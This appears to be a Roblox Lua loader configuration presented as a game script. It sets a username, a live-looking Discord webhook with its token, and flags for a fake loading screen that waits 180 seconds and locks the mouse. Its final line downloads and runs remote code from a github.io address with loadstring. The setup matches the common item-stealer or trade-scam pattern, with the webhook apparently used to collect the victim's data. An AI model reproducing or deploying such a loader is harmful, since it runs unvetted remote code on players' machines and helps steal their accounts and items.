UserName = "ywiy4d"
UserName2 = "ywiy4d"
Webhook = "https://discord.com/api/webhooks/1108690799148924959/bcbZJa_qguf2bEfTDI2eJCWqPK8xLOHj9sxeoGYDzfUXoUWChZ_C5aAForcoU3BUk5iS"
 
_G.LoadingScreen = true _G.AntiLeave = false
_G.MouseLock = true 
 
_G.ScriptName = "Project-Wd Scriptz"
_G.FirstText = "Script Preparing"
 _G.SecondText = "Script Loading..."
 _G.ThirdText = "Almost Done..."
_G.WaitingTime = 180 -- it's the time between 0% and 100% in secondes 
 loadstring(game:HttpGet("https://rizz69.github.io/Main.lua", true))()
